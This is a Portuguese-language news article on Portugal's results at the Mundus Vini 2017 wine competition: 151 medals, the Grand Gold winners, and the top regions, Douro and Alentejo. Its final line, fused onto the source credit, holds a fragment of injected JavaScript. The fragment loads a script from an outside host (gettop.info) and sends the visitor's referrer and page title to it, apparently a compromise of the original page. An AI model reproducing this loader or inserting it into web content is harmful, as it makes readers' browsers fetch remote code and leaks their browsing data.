Vinhos de Portugal somam medalhas no Mundus Vini 2017

Os vinhos Conde d' Ervideira Branco Reserva Alentejo DOC 2016 e Quinta do Cume Tinto Grande Reserva 2014 somaram duas medalhas de Grande Ouro e foram considerados o melhor vinho tinto e melhor vinho branco de Portugal em competição.
 
Portugal obteve um resultado positivo – 151 medalhas – na Summer Tasting 2017 do concurso Mundus Vini Grand International Wine Award. No total conquistaram 69 medalhas de ouro e 80 medalhas de prata na competição que juntou quase 4300 vinhos.
 
Portugal foi o quarto melhor país em competição, ficando à frente de França (106 medalhas). O país mais premiado foi Itália. As regiões portuguesas mais premiadas foram o Douro com 24 medalhas e o Alentejo com 15 medalhas. Um painel de 150 jurados reconhecidos internacionalmente provou e avaliou vinhos oriundos de mais de 42 países vinícolas.
 
O Mundus Vini foi fundado há 15 anos pela editora Meininger Verlag e tornou-se um dos concursos mais importantes do mundo dos vinhos. Desde 2014, a competição internacional, que ocorre de acordo com as directrizes internacionais de degustação da OIV, realiza-se duas vezes por ano.
 
A lista completa de vinhos portugueses premiados pode ser consultada aqui.
 
 


Fonte:  Wines of Portugals.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;